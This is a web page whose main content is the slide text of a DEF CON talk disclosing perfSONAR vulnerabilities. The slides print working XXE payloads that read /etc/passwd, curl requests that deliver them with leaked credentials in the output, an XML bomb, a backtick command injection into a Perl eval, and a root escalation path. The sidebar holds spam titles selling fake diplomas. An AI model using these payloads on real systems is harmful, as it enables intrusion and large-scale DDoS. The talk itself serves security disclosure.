Incrementalism: An Industrial Strategy For Adopting Modern Automation
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
 
PPT
PPTPPT
PPT
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
 

More from mark-smith

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
mark-smith
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
mark-smith
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topics
mark-smith
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Apple
mark-smith
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10
mark-smith
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Context
mark-smith
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
mark-smith
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnets
mark-smith
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacy
mark-smith
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness
mark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
mark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
mark-smith
 

More from mark-smith (12)

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topics
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Apple
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Context
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnets
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacy
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 

Recently uploaded

一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
k4ncd0z
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
Donato Onofri
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
rtunex8r
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
uehowe
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
wolfsoftcompanyco
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
xjq03c34
 
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
3a0sd7z3
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
3a0sd7z3
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
Tarandeep Singh
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
Toptal Tech
 
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
uehowe
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
Paul Walk
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
fovkoyb
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
davidjhones387
 

Recently uploaded (16)

一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
 
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
 
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
 

Attacking Network Infrastructure to Generate a 4 Tbs DDoS

  • 1. ATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5 by Luke Young
  • 2. $ WHOAMI ➤ Undergraduate Student - Junior ➤ 2nd year at DEF CON ➤ Website: bored.engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng
  • 3. DISCLAIMER ➤ The views and opinions expressed in this presentation are those of the authors and do not necessarily reflect the official policy or position of any current or previous employer. Examples of exploitation performed within this presentation are only examples and they should not be utilized in the real-world.
  • 4. AGENDA ➤ What is Internet2? ➤ What is perfSONAR? ➤ Exploiting perfSONAR ➤ Privilege Escalation to root ➤ Enumerating perfSONAR Instances ➤ Code Release and Q&A
  • 5. BACKSTORY ➤ “The Internet is a global system of interconnected networks. The University connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These networks provide high bandwidth connectivity enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world.”
  • 6. WHAT IS A INTERNET2? ➤ “Internet2 is an exceptional community of U.S. and international leaders in research, academia, industry and government who create and collaborate via innovative technologies. Together, we accelerate research discovery, advance national and global education, and improve the delivery of public services.” ➤ 282 - Higher Education ➤ 86 - Corporations ➤ 66 - Affiliate members (Governments) ➤ 42 - Regional and State Education Networks
  • 7. ➤ Lookout ➤ Office 365 ➤ Rackspace ➤ SoftLayer ➤ Splunk ➤ VMWare ➤ Zoom WHAT IS A INTERNET2? ➤ AWS ➤ Azure ➤ Box ➤ Dropbox ➤ DocuSign ➤ Duo Security ➤ LastPass
  • 8. WHAT IS A INTERNET2?
  • 9. INTERNET2 PRODUCTS ➤ Trust Identity & Middleware ➤ InCommon Federation ➤ Shibboleth ➤ Performance & Analytics ➤ BWCTL - Bandwidth Test Controller ➤ NDT - Network Diagnostic Tool ➤ OWAMP - One-Way Ping ➤ perfSONAR - pS-Performance Toolkit
  • 13. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE author [ <!ELEMENT author (#PCDATA)> <!ENTITY ly "Luke Young"> ]> <presentations> <presentation> <name>Investigating the Practicality and Cost of Abusing Memory Errors</name> <location>DEF CON 23</location> <author>&ly;</author> </presentation> <presentation> <name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name> <location>DEF CON 24</location> <author>&ly;</author> </presentation> </presentations>
  • 14. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  • 15. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
  • 18. PERFSONAR ISSUE #783 REBORN <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:data> &xxe; </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 19. PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin admin:x:500:505::/home/admin:/bin/bash sudo:x:501:506::/home/sudo:/bin/bash </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @passwd.xml http://perfSONAR:8090/
  • 20. PERFSONAR ISSUE #783 REBORN <soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <soapenv:Fault> <faultcode>soapenv:Server.Internal</faultcode> <faultstring>Error parsing message: I/O error : Permission denied I/O error : Permission denied :1: parser error : Failure to process entity xxe g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ :1: parser error : Entity 'xxe' not defined g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760 </faultstring> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope> curl -X POST -d @shadow.xml http://perfSONAR:8090/
  • 21. PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>[main] sql_db_engine = django.db.backends.postgresql_psycopg2 sql_db_name = esmond sql_db_user = esmond sql_db_password = 7hc4m1 tsdb_root = %(ESMOND_ROOT)s/tsdb-data ... </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @esmond.xml http://perfSONAR:8090/
  • 22. PERFSONAR EXPLOITATION ➤ XXS and XXE abundant ➤ RCE seemed impossible
  • 24. PERFSONAR - BANDWIDTHGRAPH.CGI if ( scalar @childnodes == 1 ) { if ( $child->textContent =~ m/(E|e)rror/ || $child->textContent =~ m/Query returned 0 results/ ) { next; } } my %tsresult = (); my $throughput = eval( $child->getAttribute("throughput") ); my $eTime = $child->getAttribute("timeValue"); my $etimestamp; }
  • 26. PERFSONAR - BANDWIDTHGRAPH.CGI <nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http:// ggf.org/ns/nmwg/base/2.0/"> <iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> </nmwg:data>
  • 27. PERFSONAR - BANDWIDTHGRAPH.CGI my $cgi = new CGI; my $ma_url = $cgi->param('url'); my $key = $cgi->param('key'); ... if ( !defined $ma_url ) { print $cgi->header; my $errmsg = "Missing MA_URL"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } ... if ( !defined $key ) { ... if(!$key){ print $cgi->header; my $errmsg = "Unable to find matching MA key for provided parameters"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } }
  • 28. PERFSONAR - BANDWIDTHGRAPH.CGI my $res = &getData( $ma_url, $key, $start, $end ); ... sub getData() { foreach my $k (@keyList){ my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } ); ... my $result = $ma->setupDataRequest( ... );
 ... my @childnodes = $root->findnodes("./*[local-name()='datum']"); ... foreach my $child (@childnodes) { ... my $throughput = eval( $child->getAttribute("throughput") ); ... } } }
  • 29. PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message. 3046685" type=“EchoRequest"> <nmwg:metadata id=“metadata.12999789"> <nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</ nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.12999789" id=“data.1942969”></nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 30. PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:metadata id="metadata.1337"> <nmwg:eventType>success.test</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.1337"> <iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 38. PERFSONAR - CONFIGMANAGER ➤ /etc/hosts ➤ /etc/ntp.conf ➤ /etc/ntp/step-tickers ➤ /etc/bwctld/bwctld.conf ➤ /etc/bwctld/bwctld.limits ➤ /etc/owampd/owampd.limits ➤ /usr/ndt/tcpbw100.html ➤ /opt/perfsonar_ps/ls_registration_daemon/ etc/ls_registration_daemon.conf ➤ /opt/perfsonar_ps/regular_testing/etc/ regular_testing.conf ➤ /opt/perfsonar_ps/toolkit/etc/ administrative_info ➤ /opt/perfsonar_ps/toolkit/etc/ enabled_services ➤ /opt/perfsonar_ps/toolkit/etc/ external_addresses ➤ /opt/perfsonar_ps/toolkit/etc/ ntp_known_servers
  • 40. Backup original bwctld.conf Use ConfigManager to stop bwctld Write executable posthook.pl Use ConfigManager to write new bwctld.conf Use ConfigManager to start bwctld PERFSONAR - CONFIGMANAGER Trigger a bwctl session, triggering posthook.pl as root Use ConfigManager to stop bwctld Remove posthook.pl Restore original bwctld.conf Use ConfigManager to start bwctld back to original configuration
  • 45.
  • 51. PERFSONAR NETWORK SUMMARY ➤ 970 Publicly routable nodes ➤ 12.51 TB of RAM ➤ 29.85 THz CPU Cycles ➤ Average Node: ➤ 13 GB of RAM ➤ 12 Cores at 2.6 GHz
  • 52. PERFSONAR THEORETICAL NETWORK SPEED 5.719 Tb/s
  • 54. CALCULATING ACTUAL NETWORK SPEED ➤ Enumerate all perfSONAR instances and their maximum interface speed ➤ Calculate instance location from GeoIP ➤ Match 5 closest instances of same or faster interface speed
  • 55. CALCULATING ACTUAL NETWORK SPEED ➤ index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled | where mvindex(enabled,0)="1" | fillnull value=10000000000 speed | iplocation address | map maxsearches=100000 search="search index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename services{}.enabled as peer_enabled | eval peer_enabled = mvindex(peer_enabled,0) | where peer_enabled="1" | eval address=$address$, speed=$speed$ | rename external_address.address as peer_address, external_address.speed as peer_speed | fillnull value=10000000000 peer_speed | where peer_address!=address AND peer_speed >= speed | eval lat=$lat$, lon=$lon$ | iplocation prefix=peer_ peer_address | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2)) | where distance!=0 | sort distance | head 5 | fields address, speed, peer_address, peer_speed, distance" | table address, speed, peer_address, peer_speed, distance
  • 56. CALCULATING ACTUAL NETWORK SPEED ➤ Never run 2 tests with the same instance at the same time ➤ Never run more than 10 tests at the same time ➤ Never test a host that doesn’t have bwctl enabled
  • 57. PERFSONAR ACTUAL NETWORK SPEED 3.703 Tb/s
  • 59. CONCLUSION ➤ oppd (XXE) - unresolved ➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd ➤ ConfigDaemon (PrivEsc) - unresolved
